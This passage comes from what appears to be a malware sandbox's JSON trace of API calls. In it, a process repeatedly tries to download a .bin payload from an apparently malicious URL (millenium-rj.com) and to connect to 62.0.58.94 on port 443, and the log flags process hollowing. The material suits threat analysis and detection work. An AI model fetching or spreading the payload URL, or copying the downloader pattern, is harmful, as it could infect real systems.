"0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 967 }, { "timestamp": "2025-02-27 23:34:22,862", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 968 }, { "timestamp": "2025-02-27 23:34:26,894", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1104" } ], "repeated": 0, "id": 969 }, { "timestamp": "2025-02-27 23:34:26,894", "thread_id": "11160", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 8, "id": 970 }, { "timestamp": "2025-02-27 23:34:26,894", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0004" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 971 }, { "timestamp": "2025-02-27 23:34:26,894", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 972 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 973 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0008", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 974 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 975 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0008" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 976 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 1, "id": 977 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7650cb52", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } ], "repeated": 0, "id": 978 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7650cb97", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "DESKTOP-JQK72EN" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 979 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7650cbfc", "parentcaller": "0x7650ca56", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 980 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7650cb52", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" } ], "repeated": 0, "id": 981 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7650cb97", "parentcaller": "0x7650ca56", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "DESKTOP-JQK72EN" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 982 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7650cbfc", "parentcaller": "0x7650ca56", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 983 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "AutoDetect" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "0" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect" } ], "repeated": 0, "id": 984 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "IntranetName" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName" } ], "repeated": 0, "id": 985 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x7653696a", "parentcaller": "0x764f35f8", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x000003c4" }, { "name": "ValueName", "value": "ProxyBypass" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "1" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass" } ], "repeated": 0, "id": 986 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72dbd5c6", "parentcaller": "0x7272584b", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 987 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x764e254a", "parentcaller": "0x72dbd42e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 988 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 989 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x0000048c", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1164" } ], "repeated": 0, "id": 990 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 991 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x000\\xadt\\x00" } ], "repeated": 0, "id": 992 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 993 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xc9\\xf7\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 994 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 995 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2,\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 996 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000048c" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2,\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 997 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 998 }, { "timestamp": "2025-02-27 23:34:27,909", "thread_id": "11160", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 999 }, { "timestamp": "2025-02-27 23:34:31,925", "thread_id": "11160", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1164" } ], "repeated": 0, "id": 1000 }, { "timestamp": "2025-02-27 23:34:31,925", "thread_id": "11036", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1001 }, { "timestamp": "2025-02-27 23:34:31,925", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc0008" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1002 }, { "timestamp": "2025-02-27 23:34:31,925", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1003 }, { "timestamp": "2025-02-27 23:34:31,925", "thread_id": "11036", "caller": "0x72dabc04", "parentcaller": "0x72dda29d", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 6, "id": 1004 }, { "timestamp": "2025-02-27 23:34:32,987", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc000c", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1005 }, { "timestamp": "2025-02-27 23:34:32,987", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1006 }, { "timestamp": "2025-02-27 23:34:32,987", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc000c" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1007 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x72dabb71", "parentcaller": "0x72e00454", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 27, "id": 1008 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x00000498", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1176" } ], "repeated": 0, "id": 1009 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": "FileIoStatusBlockRangeInformation" }, { "name": "FileInformation", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1010 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x771b79df", "parentcaller": "0x771b77f6", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "30", "pretty_value": "FileCompletionInformation" }, { "name": "FileInformation", "value": "T\\x00\\x00\\x00\\xe8\\xa2t\\x00" } ], "repeated": 0, "id": 1011 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x72dddaeb", "parentcaller": "0x72ddd9e7", "category": "network", "api": "bind", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1176" }, { "name": "ip", "value": "0.0.0.0" }, { "name": "port", "value": "0" } ], "repeated": 0, "id": 1012 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x71a4bb1d", "parentcaller": "0x7700234d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "IoControlCode", "value": "0x0001202f", "pretty_value": "IOCTL_AFD_GET_SOCK_NAME" }, { "name": "InputBuffer", "value": "" }, { "name": "OutputBuffer", "value": "\\x02\\x00\\xca\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1013 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x72dddb27", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1176" }, { "name": "level", "value": "0x00000006" }, { "name": "optname", "value": "0x00000001" }, { "name": "optval", "value": "\\x01\\x00\\x00\\x00" } ], "repeated": 0, "id": 1014 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x17\\x00\\x00\\x98\\x01\\x00\\x00\\x00\\xab\\xf2<\\x04\\x01\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1015 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x71a3a7f4", "parentcaller": "0x76fff4f1", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000498" }, { "name": "IoControlCode", "value": "0x000120bf", "pretty_value": "IOCTL_AFD_DEFER_ACCEPT" }, { "name": "InputBuffer", "value": "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00,\\x01\\x00\\x98\\x01\\x00\\x00\\x00P\\xf2<\\x04\\x08\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 1016 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x72dddba3", "parentcaller": "0x72ddd9e7", "category": "network", "api": "setsockopt", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1176" }, { "name": "level", "value": "0x0000ffff" }, { "name": "optname", "value": "0x00001002" }, { "name": "optval", "value": "\\x00\\x00\\x04\\x00" } ], "repeated": 0, "id": 1017 }, { "timestamp": "2025-02-27 23:34:33,034", "thread_id": "11036", "caller": "0x72ddd601", "parentcaller": "0x72ddd4d6", "category": "network", "api": "ConnectEx", "status": false, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1176" }, { "name": "SendBuffer", "value": "" }, { "name": "ip", "value": "62.0.58.94" }, { "name": "port", "value": "443" } ], "repeated": 0, "id": 1018 }, { "timestamp": "2025-02-27 23:34:37,034", "thread_id": "11036", "caller": "0x72de96b2", "parentcaller": "0x72ec3a14", "category": "network", "api": "closesocket", "status": true, "return": "0x00000000", "arguments": [ { "name": "socket", "value": "1176" } ], "repeated": 0, "id": 1019 }, { "timestamp": "2025-02-27 23:34:37,034", "thread_id": "11160", "caller": "0x72e59ac9", "parentcaller": "0x72ddc292", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 1020 }, { "timestamp": "2025-02-27 23:34:37,034", "thread_id": "11160", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00759000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1021 }, { "timestamp": "2025-02-27 23:34:37,034", "thread_id": "11160", "caller": "0x771b81f9", "parentcaller": "0x76f5d0b9", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1022 }, { "timestamp": "2025-02-27 23:34:37,034", "thread_id": "11160", "caller": "0x76f5a158", "parentcaller": "0x76f5a03b", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 9, "id": 1023 }, { "timestamp": "2025-02-27 23:34:37,066", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenUrlA", "status": false, "return": "0x00000000", "arguments": [ { "name": "ConnectionHandle", "value": "0x00cc000c" }, { "name": "URL", "value": "https://millenium-rj.com/ozil/floow_HQaIKx54.bin" }, { "name": "Headers", "value": "" }, { "name": "Flags", "value": "0x84000100" } ], "repeated": 0, "id": 1024 }, { "timestamp": "2025-02-27 23:34:37,066", "thread_id": "2840", "caller": "0x00566e14", "parentcaller": "0x00000000", "category": "system", "api": "NtDelayExecution", "status": true, "return": "0x00000000", "arguments": [ { "name": "Milliseconds", "value": "1000" } ], "repeated": 0, "id": 1025 }, { "timestamp": "2025-02-27 23:34:39,128", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 4, "id": 1026 }, { "timestamp": "2025-02-27 23:34:39,128", "thread_id": "2840", "caller": "0x00566981", "parentcaller": "0x00000000", "category": "network", "api": "InternetOpenA", "status": true, "return": "0x00cc0010", "arguments": [ { "name": "Agent", "value": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" }, { "name": "AccessType", "value": "0x00000000" }, { "name": "ProxyName", "value": "" }, { "name": "ProxyBypass", "value": "" }, { "name": "Flags", "value": "0x00000000" } ], "repeated": 0, "id": 1027 }, { "timestamp": "2025-02-27 23:34:39,128", "thread_id": "2840", "caller": "0x0056cf9e", "parentcaller": "0x00000000", "category": "threading", "api": "NtGetContextThread", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadHandle", "value": "0xfffffffe" }, { "name": "HollowedInstructionPointer", "value": "0x00000000" }, { "name": "CurrentInstructionPointer", "value": "0x00000000" }, { "name": "ProcessId", "value": "3552" } ], "repeated": 0, "id": 1028 }, { "timestamp": "2025-02-27 23:34:39,128", "thread_id": "2840", "caller": "0x0056d45a", "parentcaller": "0x00000000", "category": "network", "api": "InternetSetOptionA", "status": true, "return": "0x00000001", "arguments": [ { "name": "InternetHandle", "value": "0x00cc0010" }, { "name": "Option", "value": "0x00000002", "pretty_value": "INTERNET_OPTION_CONNECT_TIMEOUT" }, { "name": "Buffer", "value": "0x000007d0" } ], "repeated": 0, "id": 1029 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x764e2689", "parentcaller": "0x73cbcb7a", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a0" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 1030 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a8" } ], "repeated": 0, "id": 1031 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77182010", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004ac" } ], "repeated": 0, "id": 1032 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "2840", "caller": "0x00566aea", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 2, "id": 1033 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0512a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000049c" } ], "repeated": 0, "id": 1034 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73cc2629", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000450" } ], "repeated": 0, "id": 1035 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x764e254a", "parentcaller": "0x73d0517f", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a0" } ], "repeated": 0, "id": 1036 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x77182676", "parentcaller": "0x77186a76", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000004a4" } ], "repeated": 0, "id": 1037 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x72dd2ae3", "parentcaller": "0x72dcc4b5", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 25, "id": 1038 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x72ddda5c", "parentcaller": "0x72ddd9e7", "category": "network", "api": "WSASocketW", "status": true, "return": "0x000004a4", "arguments": [ { "name": "af", "value": "2", "pretty_value": "AF_INET" }, { "name": "type", "value": "1", "pretty_value": "SOCK_STREAM" }, { "name": "protocol", "value": "6", "pretty_value": "IPPROTO_TCP" }, { "name": "socket", "value": "1188" } ], "repeated": 0, "id": 1039 }, { "timestamp": "2025-02-27 23:34:39,144", "thread_id": "11036", "caller": "0x75882066", "parentcaller": "0x72dde1bb", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000004a4" }, { "name": "HandleName", "value": "\\Device\\Afd" }, { "name": "FileInformationClass", "value": "41", "pretty_value": 